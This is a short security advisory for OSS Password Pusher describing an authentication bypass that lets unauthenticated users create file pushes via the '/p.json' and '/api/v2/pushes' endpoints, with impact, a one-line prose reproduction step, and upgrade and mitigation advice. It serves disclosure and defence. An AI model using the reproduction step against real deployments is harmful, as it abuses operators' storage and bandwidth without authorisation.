OSS Password Pusher Authentication Bypass Vulnerability in File Upload Feature

A vulnerability in OSS Password Pusher versions prior to 1.69.4 and 2.4.2 allows unauthenticated users to create file-type pushes through a generic JSON API endpoint. This issue arises under certain configurations where anonymous creation is permitted, bypassing the intended authentication requirements for file uploads. As a result, unauthorized individuals could exploit this flaw to consume resources such as storage and bandwidth.

Impact

Exploitation of this vulnerability could lead to unauthorized creation of file pushes, causing unintentional resource consumption in the form of storage and bandwidth.

Reproduction

The vulnerability can be reproduced by sending a request to the '/p.json' or '/api/v2/pushes' endpoint with the 'files' parameter included, without authentication. This can be done by setting 'allow_anonymous' to true and ensuring that file pushes are enabled.

Remediation

Users are advised to upgrade to Password Pusher versions 1.69.4 or 2.4.2, where this vulnerability has been patched. If an immediate upgrade is not possible, 'allow_anonymous' can be set to false, file push capability can be restricted or disabled, untrusted API create traffic can be blocked at the edge, and unusual unauthenticated create activity can be monitored.